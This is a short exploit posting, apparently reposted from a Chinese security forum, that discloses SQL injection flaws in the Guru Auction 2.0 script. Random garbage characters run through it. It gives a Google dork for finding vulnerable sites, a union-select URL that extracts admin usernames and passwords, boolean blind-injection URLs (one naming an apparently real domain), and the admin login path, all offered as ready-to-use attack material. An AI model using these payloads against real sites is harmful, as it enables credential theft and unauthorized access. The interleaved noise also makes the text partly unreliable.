Guru Auction 2.0 Multiple SQL Injection Vulnerabilities# }- n) [. n+ [- ]
+ X+ V3 D7 G3 S0 b3 Y
作者 : v3n0m
) k8 K2 W( L2 }2 B$ o: m2 ?应用 : Guru Auction 2.0$ X- w8 [1 J/ k/ n5 w
Price : $49
+ C! G) ^3 Y% v9 AVendor : http://www.guruscript.com/: A) C& c2 O8 g; P9 E. p! ~
Google Dork : inurl:subcat.php?cate_id=
# i6 [' Y0 l/ E1 r
f B) R7 L0 R2 N7 T! ySQLi p0c:# I9 D3 p, {& ?: w- ~' F
~~~~~~~~~~
& M! N: b7 ]1 ?' `http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
5 f$ D) ^5 e! @7 F3 E 6 [6 L$ m) h/ G5 ]! ?( q
& ^& f2 E- k( [4 ]7 ~! `
盲注 p0c:
' _0 `* t7 G* d0 _; b( F9 m4 \~~~~~~~~~~
( |8 g/ J' y0 G% y" Whttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
- e3 C$ b' d# {. dhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
4 x |( ?: B0 u: |& h+ t ; J: Z: @+ P" F0 p/ l
管理登录入口:
( Y5 h' V( n- F+ p8 B~~~~~~~~~~* x6 j0 y, W0 t/ b8 d
http://domain.tld/[path]/admin/% O7 t; {+ N" @' l @ |: B
|